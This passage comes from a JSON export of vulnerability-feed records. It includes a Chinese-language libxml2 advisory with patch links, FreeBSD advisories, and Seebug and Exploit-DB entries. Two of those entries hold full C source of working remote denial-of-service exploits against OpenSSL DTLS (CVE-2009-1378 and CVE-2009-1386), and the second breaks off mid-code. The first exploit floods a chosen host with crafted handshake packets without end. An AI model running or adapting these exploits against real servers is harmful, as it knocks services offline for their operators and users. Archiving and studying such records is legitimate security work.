target=_blank>http://security.debian.org/pool/updates/main/libx/libxml2/libxml2_2.6.27.dfsg-6_amd64.deb</a>\r\nSize/MD5 checksum: 796410 9f38a5028c33f32cf1701535c1c37984\r\n<a href=http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-utils_2.6.27.dfsg-6_amd64.deb target=_blank>http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-utils_2.6.27.dfsg-6_amd64.deb</a>\r\nSize/MD5 checksum: 36682 4de1bfa28b9361e462075451befbe66c\r\n<a href=http://security.debian.org/pool/updates/main/libx/libxml2/python-libxml2_2.6.27.dfsg-6_amd64.deb target=_blank>http://security.debian.org/pool/updates/main/libx/libxml2/python-libxml2_2.6.27.dfsg-6_amd64.deb</a>\r\nSize/MD5 checksum: 184126 1aae3163d718d0c378203b7ea1a53a9b\r\n\r\narm architecture (ARM)\r\n\r\n<a href=http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-dev_2.6.27.dfsg-6_arm.deb target=_blank>http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-dev_2.6.27.dfsg-6_arm.deb</a>\r\nSize/MD5 checksum: 673236 cda6995615db6e74610d8a51607e85e4\r\n<a href=http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-dbg_2.6.27.dfsg-6_arm.deb target=_blank>http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-dbg_2.6.27.dfsg-6_arm.deb</a>\r\nSize/MD5 checksum: 817602 c5f81e370d055ba14a40a64d3fbb6e9e\r\n<a href=http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-utils_2.6.27.dfsg-6_arm.deb target=_blank>http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-utils_2.6.27.dfsg-6_arm.deb</a>\r\nSize/MD5 checksum: 34682 4b01403ce80c2949f31559e0eacc044b\r\n<a href=http://security.debian.org/pool/updates/main/libx/libxml2/python-libxml2_2.6.27.dfsg-6_arm.deb target=_blank>http://security.debian.org/pool/updates/main/libx/libxml2/python-libxml2_2.6.27.dfsg-6_arm.deb</a>\r\nSize/MD5 checksum: 165284 f84251cc53fa6b67b7fb55f58dd47d5b\r\n<a href=http://security.debian.org/pool/updates/main/libx/libxml2/libxml2_2.6.27.dfsg-6_arm.deb target=_blank>http://security.debian.org/pool/updates/main/libx/libxml2/libxml2_2.6.27.dfsg-6_arm.deb</a>\r\nSize/MD5 checksum: 742176 2e9e6cbbc777d49a99d8a6d98c5dc799\r\n\r\nhppa architecture (HP PA RISC)\r\n\r\n<a href=http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-dev_2.6.27.dfsg-6_hppa.deb target=_blank>http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-dev_2.6.27.dfsg-6_hppa.deb</a>\r\nSize/MD5 checksum: 858220 0f8cf389ab60a7639fac0f6499325995\r\n<a href=http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-dbg_2.6.27.dfsg-6_hppa.deb target=_blank>http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-dbg_2.6.27.dfsg-6_hppa.deb</a>\r\nSize/MD5 checksum: 863998 2332655d5ec188cf038cf9fcab862d9f\r\n<a href=http://security.debian.org/pool/updates/main/libx/libxml2/libxml2_2.6.27.dfsg-6_hppa.deb target=_blank>http://security.debian.org/pool/updates/main/libx/libxml2/libxml2_2.6.27.dfsg-6_hppa.deb</a>\r\nSize/MD5 checksum: 850370 6c600a26f96c3a3eea898821b0a63937\r\n<a href=http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-utils_2.6.27.dfsg-6_hppa.deb target=_blank>http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-utils_2.6.27.dfsg-6_hppa.deb</a>\r\nSize/MD5 checksum: 36852 75d6a8790e01eacb3183e6f295542215\r\n<a href=http://security.debian.org/pool/updates/main/libx/libxml2/python-libxml2_2.6.27.dfsg-6_hppa.deb target=_blank>http://security.debian.org/pool/updates/main/libx/libxml2/python-libxml2_2.6.27.dfsg-6_hppa.deb</a>\r\nSize/MD5 checksum: 192850 f635c62c33d9a2ea17015b08370dfd8f\r\n\r\ni386 architecture (Intel ia32)\r\n\r\n<a href=http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-dbg_2.6.27.dfsg-6_i386.deb target=_blank>http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-dbg_2.6.27.dfsg-6_i386.deb</a>\r\nSize/MD5 checksum: 857246 6cebb1b5f8e5e87c00319eb59df9c497\r\n<a href=http://security.debian.org/pool/updates/main/libx/libxml2/python-libxml2_2.6.27.dfsg-6_i386.deb target=_blank>http://security.debian.org/pool/updates/main/libx/libxml2/python-libxml2_2.6.27.dfsg-6_i386.deb</a>\r\nSize/MD5 checksum: 169026 31acf12efa0a8f37045f3f0869b894f8\r\n<a href=http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-dev_2.6.27.dfsg-6_i386.deb target=_blank>http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-dev_2.6.27.dfsg-6_i386.deb</a>\r\nSize/MD5 checksum: 681544 f0f383f2ea6ae309bfbcd13f2a2e8efa\r\n<a href=http://security.debian.org/pool/updates/main/libx/libxml2/libxml2_2.6.27.dfsg-6_i386.deb target=_blank>http://security.debian.org/pool/updates/main/libx/libxml2/libxml2_2.6.27.dfsg-6_i386.deb</a>\r\nSize/MD5 checksum: 756128 f776e4a0c28389602bb6b26965fc70ce\r\n<a href=http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-utils_2.6.27.dfsg-6_i386.deb target=_blank>http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-utils_2.6.27.dfsg-6_i386.deb</a>\r\nSize/MD5 checksum: 34496 0cf1427860bb36162af23351285ff091\r\n\r\nia64 architecture (Intel ia64)\r\n\r\n<a href=http://security.debian.org/pool/updates/main/libx/libxml2/python-libxml2_2.6.27.dfsg-6_ia64.deb target=_blank>http://security.debian.org/pool/updates/main/libx/libxml2/python-libxml2_2.6.27.dfsg-6_ia64.deb</a>\r\nSize/MD5 checksum: 196528 3eaa55301a20961852f3a3c5b64bde8c\r\n<a href=http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-utils_2.6.27.dfsg-6_ia64.deb target=_blank>http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-utils_2.6.27.dfsg-6_ia64.deb</a>\r\nSize/MD5 checksum: 48494 280c616ff34b4aa41a48173828b6e66c\r\n<a href=http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-dev_2.6.27.dfsg-6_ia64.deb target=_blank>http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-dev_2.6.27.dfsg-6_ia64.deb</a>\r\nSize/MD5 checksum: 1106616 e7b32b8f711337ca52a041af581a05b6\r\n<a href=http://security.debian.org/pool/updates/main/libx/libxml2/libxml2_2.6.27.dfsg-6_ia64.deb target=_blank>http://security.debian.org/pool/updates/main/libx/libxml2/libxml2_2.6.27.dfsg-6_ia64.deb</a>\r\nSize/MD5 checksum: 1080448 a7334ed64dba73272b2001e09d18493f\r\n<a href=http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-dbg_2.6.27.dfsg-6_ia64.deb target=_blank>http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-dbg_2.6.27.dfsg-6_ia64.deb</a>\r\nSize/MD5 checksum: 874194 1410e29414572197b6f82dd5a8be061f\r\n\r\nmips architecture (MIPS (Big Endian))\r\n\r\n<a href=http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-dev_2.6.27.dfsg-6_mips.deb target=_blank>http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-dev_2.6.27.dfsg-6_mips.deb</a>\r\nSize/MD5 checksum: 840690 ad2ce083ff5c14656ea3ae28b0fa783d\r\n<a href=http://security.debian.org/pool/updates/main/libx/libxml2/libxml2_2.6.27.dfsg-6_mips.deb target=_blank>http://security.debian.org/pool/updates/main/libx/libxml2/libxml2_2.6.27.dfsg-6_mips.deb</a>\r\nSize/MD5 checksum: 770540 d1faeaa723c3de301fb4c8a44ece376a\r\n<a href=http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-utils_2.6.27.dfsg-6_mips.deb target=_blank>http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-utils_2.6.27.dfsg-6_mips.deb</a>\r\nSize/MD5 checksum: 34424 c7c9469462957365ab26e7f06e1f0521\r\n<a href=http://security.debian.org/pool/updates/main/libx/libxml2/python-libxml2_2.6.27.dfsg-6_mips.deb target=_blank>http://security.debian.org/pool/updates/main/libx/libxml2/python-libxml2_2.6.27.dfsg-6_mips.deb</a>\r\nSize/MD5 checksum: 171674 5e6f7cbe84d053bd19dda54346330f75\r\n<a href=http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-dbg_2.6.27.dfsg-6_mips.deb target=_blank>http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-dbg_2.6.27.dfsg-6_mips.deb</a>\r\nSize/MD5 checksum: 926930 c4a3402711ebb05f38b1146eebcd0a71\r\n\r\nmipsel architecture (MIPS (Little Endian))\r\n\r\n<a href=http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-utils_2.6.27.dfsg-6_mipsel.deb target=_blank>http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-utils_2.6.27.dfsg-6_mipsel.deb</a>\r\nSize/MD5 checksum: 34396 79f5ff849d9a0ed01ab567ec542b7f3e\r\n<a href=http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-dbg_2.6.27.dfsg-6_mipsel.deb target=_blank>http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-dbg_2.6.27.dfsg-6_mipsel.deb</a>\r\nSize/MD5 checksum: 898480 c195cceafe5efce1de168475a462be54\r\n<a href=http://security.debian.org/pool/updates/main/libx/libxml2/libxml2_2.6.27.dfsg-6_mipsel.deb target=_blank>http://security.debian.org/pool/updates/main/libx/libxml2/libxml2_2.6.27.dfsg-6_mipsel.deb</a>\r\nSize/MD5 checksum: 769244 d0d36bff7e63adf76857166c3ed10daa\r\n<a href=http://security.debian.org/pool/updates/main/libx/libxml2/python-libxml2_2.6.27.dfsg-6_mipsel.deb target=_blank>http://security.debian.org/pool/updates/main/libx/libxml2/python-libxml2_2.6.27.dfsg-6_mipsel.deb</a>\r\nSize/MD5 checksum: 168696 3667deae6585a788c4da731b4fc9383d\r\n<a href=http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-dev_2.6.27.dfsg-6_mipsel.deb target=_blank>http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-dev_2.6.27.dfsg-6_mipsel.deb</a>\r\nSize/MD5 checksum: 833258 4b1612f79d4b9d1ce2d7086fbb8edbd0\r\n\r\npowerpc architecture (PowerPC)\r\n\r\n<a href=http://security.debian.org/pool/updates/main/libx/libxml2/libxml2_2.6.27.dfsg-6_powerpc.deb target=_blank>http://security.debian.org/pool/updates/main/libx/libxml2/libxml2_2.6.27.dfsg-6_powerpc.deb</a>\r\nSize/MD5 checksum: 780124 0d2ed3ecc5a1e7a5ce3870fab1bcfc43\r\n<a href=http://security.debian.org/pool/updates/main/libx/libxml2/python-libxml2_2.6.27.dfsg-6_powerpc.deb target=_blank>http://security.debian.org/pool/updates/main/libx/libxml2/python-libxml2_2.6.27.dfsg-6_powerpc.deb</a>\r\nSize/MD5 checksum: 172736 2011f174234c5e939cebeedc2fd9e707\r\n<a href=http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-utils_2.6.27.dfsg-6_powerpc.deb target=_blank>http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-utils_2.6.27.dfsg-6_powerpc.deb</a>\r\nSize/MD5 checksum: 37662 94991d67033b1b921bb72e5d7bf2b844\r\n<a href=http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-dbg_2.6.27.dfsg-6_powerpc.deb target=_blank>http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-dbg_2.6.27.dfsg-6_powerpc.deb</a>\r\nSize/MD5 checksum: 898080 321d90790cf68bc046b9b577e7986438\r\n<a href=http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-dev_2.6.27.dfsg-6_powerpc.deb target=_blank>http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-dev_2.6.27.dfsg-6_powerpc.deb</a>\r\nSize/MD5 checksum: 771124 47b6d53839ea42f54ae6ad2b89594a26\r\n\r\ns390 architecture (IBM S/390)\r\n\r\n<a href=http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-utils_2.6.27.dfsg-6_s390.deb target=_blank>http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-utils_2.6.27.dfsg-6_s390.deb</a>\r\nSize/MD5 checksum: 36368 fbc5505f4471c4c2fe6ad41903c5596f\r\n<a href=http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-dbg_2.6.27.dfsg-6_s390.deb target=_blank>http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-dbg_2.6.27.dfsg-6_s390.deb</a>\r\nSize/MD5 checksum: 885484 ead63bcf342e568c9c338c2772ea4e0d\r\n<a href=http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-dev_2.6.27.dfsg-6_s390.deb target=_blank>http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-dev_2.6.27.dfsg-6_s390.deb</a>\r\nSize/MD5 checksum: 750248 ed7465c981212e90fac94dc040ac6bb4\r\n<a href=http://security.debian.org/pool/updates/main/libx/libxml2/python-libxml2_2.6.27.dfsg-6_s390.deb target=_blank>http://security.debian.org/pool/updates/main/libx/libxml2/python-libxml2_2.6.27.dfsg-6_s390.deb</a>\r\nSize/MD5 checksum: 185718 414512cb0af24a7c5e3622b75ef9b56f\r\n<a href=http://security.debian.org/pool/updates/main/libx/libxml2/libxml2_2.6.27.dfsg-6_s390.deb target=_blank>http://security.debian.org/pool/updates/main/libx/libxml2/libxml2_2.6.27.dfsg-6_s390.deb</a>\r\nSize/MD5 checksum: 806342 0f85b6120fdba835eaf39d02b4a606d9\r\n\r\nsparc architecture (Sun SPARC/UltraSPARC)\r\n\r\n<a href=http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-utils_2.6.27.dfsg-6_sparc.deb target=_blank>http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-utils_2.6.27.dfsg-6_sparc.deb</a>\r\nSize/MD5 checksum: 34578 dd02c5498d378ee75330f8f93b2eb3a7\r\n<a href=http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-dbg_2.6.27.dfsg-6_sparc.deb target=_blank>http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-dbg_2.6.27.dfsg-6_sparc.deb</a>\r\nSize/MD5 checksum: 781490 ecf288ea66fc19e8f9874b90884a888e\r\n<a href=http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-dev_2.6.27.dfsg-6_sparc.deb target=_blank>http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-dev_2.6.27.dfsg-6_sparc.deb</a>\r\nSize/MD5 checksum: 713214 434a8a91f3a4acbfc3df2a2707acbbe0\r\n<a href=http://security.debian.org/pool/updates/main/libx/libxml2/libxml2_2.6.27.dfsg-6_sparc.deb target=_blank>http://security.debian.org/pool/updates/main/libx/libxml2/libxml2_2.6.27.dfsg-6_sparc.deb</a>\r\nSize/MD5 checksum: 759786 83ba89269fd32296c48c8498e100372b\r\n<a href=http://security.debian.org/pool/updates/main/libx/libxml2/python-libxml2_2.6.27.dfsg-6_sparc.deb target=_blank>http://security.debian.org/pool/updates/main/libx/libxml2/python-libxml2_2.6.27.dfsg-6_sparc.deb</a>\r\nSize/MD5 checksum: 176878 9840698d19580fe86bfc55a2347361e5\r\n\r\n\u8865\u4e01\u5b89\u88c5\u65b9\u6cd5\uff1a\r\n\r\n1. \u624b\u5de5\u5b89\u88c5\u8865\u4e01\u5305\uff1a\r\n\r\n \u9996\u5148\uff0c\u4f7f\u7528\u4e0b\u9762\u7684\u547d\u4ee4\u6765\u4e0b\u8f7d\u8865\u4e01\u8f6f\u4ef6\uff1a\r\n # wget url (url\u662f\u8865\u4e01\u4e0b\u8f7d\u94fe\u63a5\u5730\u5740)\r\n\r\n \u7136\u540e\uff0c\u4f7f\u7528\u4e0b\u9762\u7684\u547d\u4ee4\u6765\u5b89\u88c5\u8865\u4e01\uff1a \r\n # dpkg -i file.deb (file\u662f\u76f8\u5e94\u7684\u8865\u4e01\u540d)\r\n\r\n2. \u4f7f\u7528apt-get\u81ea\u52a8\u5b89\u88c5\u8865\u4e01\u5305\uff1a\r\n\r\n \u9996\u5148\uff0c\u4f7f\u7528\u4e0b\u9762\u7684\u547d\u4ee4\u66f4\u65b0\u5185\u90e8\u6570\u636e\u5e93\uff1a\r\n # apt-get update\r\n \r\n \u7136\u540e\uff0c\u4f7f\u7528\u4e0b\u9762\u7684\u547d\u4ee4\u5b89\u88c5\u66f4\u65b0\u8f6f\u4ef6\u5305\uff1a\r\n # apt-get upgrade\r\n\r\nRedHat\r\n------\r\nRedHat\u5df2\u7ecf\u4e3a\u6b64\u53d1\u5e03\u4e86\u4e00\u4e2a\u5b89\u5168\u516c\u544a\uff08RHSA-2008:0988-01\uff09\u4ee5\u53ca\u76f8\u5e94\u8865\u4e01:\r\nRHSA-2008:0988-01\uff1aImportant: libxml2 security update\r\n\u94fe\u63a5\uff1a<a href=https://www.redhat.com/support/errata/RHSA-2008-0988.html target=_blank>https://www.redhat.com/support/errata/RHSA-2008-0988.html</a>", "reporter": "Root", "published": "2008-11-20T00:00:00", "title": "libxml2 xmlSAX2Characters()\u51fd\u6570\u6574\u6570\u6ea2\u51fa\u6f0f\u6d1e", "type": "seebug", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2008-4226"], "_object_type": "robots.models.seebug.SeebugBulletin", "modified": "2008-11-20T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-4469", "id": "SSV:4469", "sourceData": "", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "", "status": "details"}, {"lastseen": "2017-11-19T18:50:10", "_object_types": ["robots.models.base.Bulletin", "robots.models.seebug.SeebugBulletin"], "references": [], "enchantments_done": [], "description": "No description provided by source.", "reporter": "Root", "published": "2009-05-19T00:00:00", "type": "seebug", "title": "OpenSSL &lt;= 0.9.8k, 1.0.0-beta2 DTLS Remote Memory Exhaustion DoS", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2009-1378"], "_object_type": "robots.models.seebug.SeebugBulletin", "modified": "2009-05-19T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-11330", "id": "SSV:11330", "sourceData": "\n /*\r\n * cve-2009-1378.c\r\n *\r\n * OpenSSL &lt;= 0.9.8k, 1.0.0-beta2 DTLS Remote Memory Exhaustion DoS\r\n * Jon Oberheide &lt;jon@oberheide.org&gt;\r\n * http://jon.oberheide.org\r\n *\r\n * Information:\r\n *\r\n * http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1378\r\n *\r\n * In dtls1_process_out_of_seq_message() the check if the current message is \r\n * already buffered was missing. For every new message was memory allocated, \r\n * allowing an attacker to perform an denial of service attack with sending \r\n * out of seq handshake messages until there is no memory left.\r\n *\r\n * Usage:\r\n *\r\n * Pass the host and port of the target DTLS server:\r\n *\r\n * $ gcc cve-2009-1378.c -o cve-2009-1378\r\n * $ ./cve-2009-1378 1.2.3.4 666\r\n *\r\n * Notes:\r\n *\r\n * With a MTU of 1500, the attack leaks 1503 bytes of memory with each UDP\r\n * datagram. If you have a bigger MTU than 1500, feel free to set it.\r\n *\r\n * Complete memory exhaustion may take a while depending on the throughput \r\n * to the target and the amount of memory it has. By default, we'll just \r\n * continue sending datagrams indefinitely.\r\n *\r\n */\r\n\r\n#include &lt;stdio.h&gt;\r\n#include &lt;string.h&gt;\r\n#include &lt;stdlib.h&gt;\r\n#include &lt;unistd.h&gt;\r\n#include &lt;errno.h&gt;\r\n#include &lt;netdb.h&gt;\r\n#include &lt;netinet/in.h&gt;\r\n#include &lt;sys/types.h&gt;\r\n#include &lt;sys/stat.h&gt;\r\n#include &lt;sys/socket.h&gt;\r\n\r\n#define MTU 1500\r\n\r\n#define IP_HDR_LEN 20\r\n#define UDP_HDR_LEN 8\r\n#define MAX_LEN (MTU - IP_HDR_LEN - UDP_HDR_LEN)\r\n\r\n#define put16(b, data) ( \\\r\n (*(b) = ((data) &gt;&gt; 8) &amp; 0xff), \\\r\n (*((b)+1) = (data) &amp; 0xff))\r\n\r\nint\r\nmain(int argc, char **argv)\r\n{\r\n\tint sock, ret;\r\n\tchar *ptr, *err;\r\n\tstruct hostent *h;\r\n\tstruct sockaddr_in target;\r\n\tchar buf[MAX_LEN];\r\n\r\n\tif (argc &lt; 3) {\r\n\t\terr = &quot;Pass the host and port of the target DTLS server&quot;;\r\n\t\tprintf(&quot;[-] Error: %s\\n&quot;, err);\r\n\t\texit(1);\r\n\t}\r\n\r\n\th = gethostbyname(argv[1]);\r\n\tif (!h) {\r\n\t\terr = &quot;Unknown host specified&quot;;\r\n\t\tprintf(&quot;[-] Error: %s (%s)\\n&quot;, err, strerror(errno));\r\n\t\texit(1);\r\n\t}\r\n\r\n\ttarget.sin_family = h-&gt;h_addrtype;\r\n\tmemcpy(&amp;target.sin_addr.s_addr, h-&gt;h_addr_list[0], h-&gt;h_length);\r\n\ttarget.sin_port = htons(atoi(argv[2]));\r\n\r\n\tsock = socket(AF_INET, SOCK_DGRAM, 0);\r\n\tif (sock == -1) {\r\n\t\terr = &quot;Failed creating UDP socket&quot;;\r\n\t\tprintf(&quot;[-] Error: %s (%s)\\n&quot;, err, strerror(errno));\r\n\t\texit(1);\r\n\t}\r\n\r\n\tret = connect(sock, (struct sockaddr *) &amp;target, sizeof(target));\r\n\tif (ret == -1) {\r\n\t\terr = &quot;Failed to connect socket&quot;;\r\n\t\tprintf(&quot;[-] Error: %s (%s)\\n&quot;, err, strerror(errno));\r\n\t\texit(1);\r\n\t}\r\n\r\n\tptr = buf;\r\n\r\n\t/* header */\r\n\tmemcpy(ptr, &quot;\\x16\\xfe\\xff\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00&quot;, 11);\r\n\tptr += 11;\r\n\r\n\t/* packet length */\r\n\tput16(ptr, MAX_LEN - ((ptr - buf) + 2));\r\n\tptr += 2;\r\n\t\r\n\t/* client hello */\r\n\tmemcpy(ptr, &quot;\\x01&quot;, 1);\r\n\tptr += 1;\r\n\t\r\n\t/* length */\r\n\tmemcpy(ptr, &quot;\\x00&quot;, 1);\r\n\tptr += 1;\r\n\tput16(ptr, MAX_LEN - ((ptr - buf) + 2 + 8));\r\n\tptr += 2;\r\n\r\n\t/* sequence number */\r\n\tmemcpy(ptr, &quot;\\x00\\x01&quot;, 2);\r\n\tptr += 2;\r\n\r\n\t/* frag offset */\r\n\tmemcpy(ptr, &quot;\\x00\\x00\\x00&quot;, 3);\r\n\tptr += 3;\r\n\r\n\t/* length */\r\n\tmemcpy(ptr, &quot;\\x00&quot;, 1);\r\n\tptr += 1;\r\n\tput16(ptr, MAX_LEN - ((ptr - buf) + 2));\r\n\tptr += 2;\r\n\r\n\t/* payload */\r\n\tmemset(ptr, '\\x00', MAX_LEN - (ptr - buf));\r\n\r\n\tprintf(&quot;[+] Firing loads of packets at %s:%s...\\n&quot;, argv[1], argv[2]);\r\n\r\n\twhile (1) {\r\n\t\tsend(sock, buf, MAX_LEN, 0);\r\n\t}\r\n\r\n\tclose(sock);\r\n\r\n\treturn 0;\r\n}\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-11330", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "status": "poc"}], "freebsd": [{"lastseen": "2018-08-31T01:15:26", "references": ["http://secunia.com/advisories/35128/"], "affectedPackage": [{"OS": "FreeBSD", "OSVersion": "any", "packageVersion": "0.9.8m", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-f10-openssl", "operator": "lt"}, {"OS": "FreeBSD", "OSVersion": "any", "packageVersion": "0.9.8k_1", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "openssl", "operator": "lt"}, {"OS": "FreeBSD", "OSVersion": "any", "packageVersion": "0.9.8f", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-f10-openssl", "operator": "eq"}, {"OS": "FreeBSD", "OSVersion": "any", "packageVersion": "0.9.8", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "openssl", "operator": "eq"}], "description": "\nSecunia reports:\n\nSome vulnerabilities have been reported in OpenSSL, which can be\n\t exploited by malicious people to cause a DoS.\nThe library does not limit the number of buffered DTLS records with\n\t a future epoch. This can be exploited to exhaust all available memory\n\t via specially crafted DTLS packets.\nAn error when processing DTLS messages can be exploited to exhaust\n\t all available memory by sending a large number of out of sequence\n\t handshake messages.\n\n", "edition": 3, "reporter": "FreeBSD", "published": "2009-05-18T00:00:00", "title": "openssl -- denial of service in DTLS implementation", "type": "freebsd", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "unix", "cvelist": ["CVE-2009-1377", "CVE-2009-1378"], "modified": "2014-04-10T00:00:00", "id": "82B55DF8-4D5A-11DE-8811-0030843D3802", "href": "https://vuxml.freebsd.org/freebsd/82b55df8-4d5a-11de-8811-0030843d3802.html", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-08-31T01:15:27", "references": [], "affectedPackage": [{"OS": "FreeBSD", "OSVersion": "any", "packageVersion": "4.4.9", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "php4-mbstring", "operator": "lt"}, {"OS": "FreeBSD", "OSVersion": "any", "packageVersion": "5.2.9", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "php5-mbstring", "operator": "lt"}], "description": "\nSecurityFocus reports:\n\nPHP is prone to a buffer-overflow vulnerability because it fails to\n\t perform boundary checks before copying user-supplied data to\n\t insufficiently sized memory buffers. The issue affects the 'mbstring'\n\t extension included in the standard distribution.\nAn attacker can exploit this issue to execute arbitrary machine\n\t code in the context of the affected webserver. Failed exploit attempts\n\t will likely crash the webserver, denying service to legitimate\n\t users.\n\n", "edition": 3, "reporter": "FreeBSD", "published": "2008-12-21T00:00:00", "title": "php-mbstring -- php mbstring buffer overflow vulnerability", "type": "freebsd", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "unix", "cvelist": ["CVE-2008-5557"], "modified": "2008-12-21T00:00:00", "id": "A2074AC6-124C-11DE-A964-0030843D3802", "href": "https://vuxml.freebsd.org/freebsd/a2074ac6-124c-11de-a964-0030843d3802.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "exploitdb": [{"lastseen": "2016-02-01T09:21:51", "osvdbidlist": ["55073"], "references": [], "edition": 1, "description": "OpenSSL < 0.9.8i DTLS ChangeCipherSpec Remote DoS Exploit. CVE-2009-1386. Dos exploits for multiple platform", "reporter": "Jon Oberheide", "published": "2009-06-04T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "type": "exploitdb", "title": "OpenSSL < 0.9.8i DTLS ChangeCipherSpec Remote DoS Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-1386"], "modified": "2009-06-04T00:00:00", "id": "EDB-ID:8873", "href": "https://www.exploit-db.com/exploits/8873/", "sourceData": "/*\n * cve-2009-1386.c\n *\n * OpenSSL < 0.9.8i DTLS ChangeCipherSpec Remote DoS\n * Jon Oberheide <jon@oberheide.org>\n * http://jon.oberheide.org\n *\n * Information:\n *\n * http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1386\n *\n * OpenSSL would SegFault if the DTLS server receives a ChangeCipherSpec as\n * the first record instead of ClientHello.\n *\n * Usage:\n *\n * Pass the host and port of the target DTLS server:\n *\n * $ gcc cve-2009-1386.c -o cve-2009-1386\n * $ ./cve-2009-1386 1.2.3.4 666\n *\n * Notes:\n *\n * Much easier than the memory exhaustion DoS issue (CVE-2009-1378) as this \n * only requires a single ChangeCipherSpec datagram, but affects an older \n * version of OpenSSL.\n *\n */\n\n#include <stdio.h>\n#include <string.h>\n#include <stdlib.h>\n#include <unistd.h>\n#include <errno.h>\n#include <netdb.h>\n#include <netinet/in.h>\n#include <sys/types.h>\n#include <sys/stat.h>\n#include <sys/socket.h>\n\nint\nmain(int argc, char **argv)\n{\n\tint sock, ret;\n\tchar *ptr, *err;\n\tstruct hostent *h;\n\tstruct sockaddr_in target;\n\tchar buf[64];\n\n\tif (argc < 3) {\n\t\terr = \"Pass the host and port of the target DTLS server\";\n\t\tprintf(\"[-] Error: %s\\n\", err);\n\t\texit(1);\n\t}\n\n\th = gethostbyname(argv[1]);\n\tif (!h) {\n\t\terr = \"Unknown host specified\";\n\t\tprintf(\"[-] Error: %s (%s)\\n\", err, strerror(errno));\n\t\texit(1);\n\t}\n\n\ttarget.sin_family = h->h_addrtype;\n\tmemcpy(&target.sin_addr.s_addr, h->h_addr_list[0], h->h_length);\n\ttarget.sin_port = htons(atoi(argv[2]));\n\n\tsock = socket(AF_INET, SOCK_DGRAM, 0);\n\tif (sock == -1) {\n\t\terr = \"Failed creating UDP socket\";\n\t\tprintf(\"[-] Error: %s (%s)\\n\", err, strerror(errno));\n\t\texit(1);\n\t}\n\n\tret = connect(sock, (struct sockaddr *) &target, sizeof(target));\n\tif (ret == -1) {\n\t\terr = \"Failed to connect socket\";\n\t\tprintf(\"[-] Error: %s 